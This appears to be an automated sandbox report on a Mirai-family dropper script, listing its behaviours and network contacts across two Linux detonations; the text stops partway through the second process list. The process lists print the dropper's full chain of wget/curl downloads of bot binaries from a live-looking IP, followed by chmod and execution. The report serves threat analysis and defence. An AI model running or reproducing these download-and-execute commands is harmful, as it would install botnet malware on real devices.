Analysis Overview
SHA256
951f2e24a8f4c1102b1b8b707e3b5610e83f3a40f94c6b6fe6ba17e3ed33c7ed
Threat Level: Known bad
The file ohshit.sh was found to be: Known bad.
Malicious Activity Summary
Mirai family
Mirai
File and Directory Permissions Modification
Executes dropped EXE
Modifies Watchdog functionality
Enumerates running processes
Writes file to system bin folder
UPX packed file
Checks CPU configuration
System Network Configuration Discovery
Writes file to tmp directory
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-09 08:32
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-09 08:32
Reported
2024-11-09 08:34
Platform
debian9-armhf-20240611-en
Max time kernel
139s
Max time network
153s
Command Line
Signatures
Mirai
Mirai family
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
Modifies Watchdog functionality
| Description | Indicator | Process | Target |
| File opened for modification | /dev/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /dev/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/Chaotic | N/A |
Enumerates running processes
Writes file to system bin folder
| Description | Indicator | Process | Target |
| File opened for modification | /bin/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /sbin/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /bin/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /sbin/watchdog | /tmp/Chaotic | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/4/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/20/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/462/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/1/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/149/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/27/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/74/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/647/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/648/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/3/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/401/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/267/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/605/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/302/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/18/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/414/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/74/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/147/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/831/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/28/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/265/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/308/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/95/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/2/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/6/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/305/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/5/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/21/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/self/exe | /tmp/Chaotic | N/A |
| File opened for reading | /proc/19/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/43/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/776/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/318/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/166/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/305/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/28/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/17/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/749/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/13/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/414/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/641/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/10/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/12/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/21/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/605/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/685/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/22/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/107/status | /tmp/Chaotic | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/cat | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/camp.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.mpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.m68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.mips64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.arm6 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/busybox | /bin/cp | N/A |
| File opened for modification | /tmp/camp.arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.x86_64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.arm7 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.sh4 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.i686 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.arm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.i686 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.arm5 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.sparc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.m68k | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.arc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/Chaotic | /tmp/ohshit.sh | N/A |
| File opened for modification | /tmp/camp.x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.x86_64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.arm | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.sh4 | /usr/bin/curl | N/A |
Processes
/tmp/ohshit.sh
[/tmp/ohshit.sh]
/bin/cp
[cp /bin/busybox /tmp/]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.arc]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.arc]
/bin/cat
[cat camp.arc]
/bin/chmod
[chmod +x busybox camp.arc Chaotic ohshit.sh systemd-private-240a3117a79344cd8c777522777d3880-systemd-timedated.service-YuhGQG]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.x86]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.x86]
/bin/cat
[cat camp.x86]
/bin/chmod
[chmod +x busybox camp.arc camp.x86 Chaotic ohshit.sh systemd-private-240a3117a79344cd8c777522777d3880-systemd-timedated.service-YuhGQG]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.x86_64]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.x86_64]
/bin/cat
[cat camp.x86_64]
/bin/chmod
[chmod +x busybox camp.arc camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-240a3117a79344cd8c777522777d3880-systemd-timedated.service-YuhGQG]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.i686]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.i686]
/bin/cat
[cat camp.i686]
/bin/chmod
[chmod +x busybox camp.arc camp.i686 camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-240a3117a79344cd8c777522777d3880-systemd-timedated.service-YuhGQG]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.mips]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.mips]
/bin/cat
[cat camp.mips]
/bin/chmod
[chmod +x busybox camp.arc camp.i686 camp.mips camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-240a3117a79344cd8c777522777d3880-systemd-timedated.service-YuhGQG]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.mips64]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.mips64]
/bin/cat
[cat camp.mips64]
/bin/chmod
[chmod +x busybox camp.arc camp.i686 camp.mips camp.mips64 camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-240a3117a79344cd8c777522777d3880-systemd-timedated.service-YuhGQG]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.mpsl]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.mpsl]
/bin/cat
[cat camp.mpsl]
/bin/chmod
[chmod +x busybox camp.arc camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-240a3117a79344cd8c777522777d3880-systemd-timedated.service-YuhGQG]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.arm]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.arm]
/bin/cat
[cat camp.arm]
/bin/chmod
[chmod +x busybox camp.arc camp.arm camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-240a3117a79344cd8c777522777d3880-systemd-timedated.service-YuhGQG]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.arm5]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.arm5]
/bin/cat
[cat camp.arm5]
/bin/chmod
[chmod +x busybox camp.arc camp.arm camp.arm5 camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic ohshit.sh]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.arm6]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.arm6]
/bin/cat
[cat camp.arm6]
/bin/chmod
[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic ohshit.sh]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.arm7]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.arm7]
/bin/cat
[cat camp.arm7]
/bin/chmod
[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic ohshit.sh]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.ppc]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.ppc]
/bin/cat
[cat camp.ppc]
/bin/chmod
[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.mips camp.mips64 camp.mpsl camp.ppc camp.x86 camp.x86_64 Chaotic ohshit.sh]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.sparc]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.sparc]
/bin/cat
[cat camp.sparc]
/bin/chmod
[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.mips camp.mips64 camp.mpsl camp.ppc camp.sparc camp.x86 camp.x86_64 Chaotic ohshit.sh]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.m68k]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.m68k]
/bin/cat
[cat camp.m68k]
/bin/chmod
[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.m68k camp.mips camp.mips64 camp.mpsl camp.ppc camp.sparc camp.x86 camp.x86_64 Chaotic ohshit.sh]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.sh4]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.sh4]
/bin/cat
[cat camp.sh4]
/bin/chmod
[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.m68k camp.mips camp.mips64 camp.mpsl camp.ppc camp.sh4 camp.sparc camp.x86 camp.x86_64 Chaotic ohshit.sh]
/tmp/Chaotic
[./Chaotic]
Network
| Country | Destination | Domain | Proto |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:3778 | N/A | tcp |
Unique destinations shown: the run logged 30 TCP connections to 198.12.107.126:80 (matching the wget/curl downloads from http://198.12.107.126/bins/ in the process list) and 4 TCP connections to 198.12.107.126:3778, for which no domain was recorded.
Files
/tmp/busybox
/tmp/camp.arc
/tmp/Chaotic
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-09 08:32
Reported
2024-11-09 08:34
Platform
debian9-mipsbe-20240729-en
Max time kernel
145s
Max time network
146s
Command Line
Signatures
Mirai
Mirai family
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
Modifies Watchdog functionality
| Description | Indicator | Process | Target |
| File opened for modification | /dev/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/Chaotic | N/A |
Enumerates running processes
Writes file to system bin folder
| Description | Indicator | Process | Target |
| File opened for modification | /sbin/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /bin/watchdog | /tmp/Chaotic | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/4/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/9/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/16/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/327/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/379/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/678/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/filesystems | /bin/cp | N/A |
| File opened for reading | /proc/2/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/78/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/161/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/356/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/386/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/8/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/74/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/84/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/176/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/715/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/722/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/811/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/23/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/71/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/5/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/3/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/70/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/72/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/77/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/717/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/12/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/37/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/36/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/673/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/707/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/714/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/7/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/10/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/353/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/712/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/819/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/19/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/22/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/122/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/155/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/240/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/73/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/83/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/6/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/14/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/354/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/798/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/75/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/17/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/20/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/675/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/81/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/121/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/24/status | /tmp/Chaotic | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/camp.ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.m68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.x86_64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.arm5 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.sh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.arm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.sh4 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.mips64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.mpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.sparc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.m68k | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.x86_64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.i686 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.arm7 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.arm | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.arm6 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/Chaotic | /tmp/ohshit.sh | N/A |
| File opened for modification | /tmp/camp.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.i686 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/busybox | /bin/cp | N/A |
| File opened for modification | /tmp/camp.arc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.x86 | /usr/bin/curl | N/A |
Processes
/tmp/ohshit.sh
[/tmp/ohshit.sh]
/bin/cp
[cp /bin/busybox /tmp/]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.arc]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.arc]
/bin/cat
[cat camp.arc]
/bin/chmod
[chmod +x busybox camp.arc Chaotic ohshit.sh systemd-private-62296eb1a0ad45a38bb7146d93baeaea-systemd-timedated.service-WmNdZD]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.x86]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.x86]
/bin/cat
[cat camp.x86]
/bin/chmod
[chmod +x busybox camp.arc camp.x86 Chaotic ohshit.sh systemd-private-62296eb1a0ad45a38bb7146d93baeaea-systemd-timedated.service-WmNdZD]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.x86_64]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.x86_64]
/bin/cat
[cat camp.x86_64]
/bin/chmod
[chmod +x busybox camp.arc camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-62296eb1a0ad45a38bb7146d93baeaea-systemd-timedated.service-WmNdZD]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.i686]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.i686]
/bin/cat
[cat camp.i686]
/bin/chmod
[chmod +x busybox camp.arc camp.i686 camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-62296eb1a0ad45a38bb7146d93baeaea-systemd-timedated.service-WmNdZD]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.mips]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.mips]
/bin/cat
[cat camp.mips]
/bin/chmod
[chmod +x busybox camp.arc camp.i686 camp.mips camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-62296eb1a0ad45a38bb7146d93baeaea-systemd-timedated.service-WmNdZD]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.mips64]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.mips64]
/bin/cat
[cat camp.mips64]
/bin/chmod
[chmod +x busybox camp.arc camp.i686 camp.mips camp.mips64 camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-62296eb1a0ad45a38bb7146d93baeaea-systemd-timedated.service-WmNdZD]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
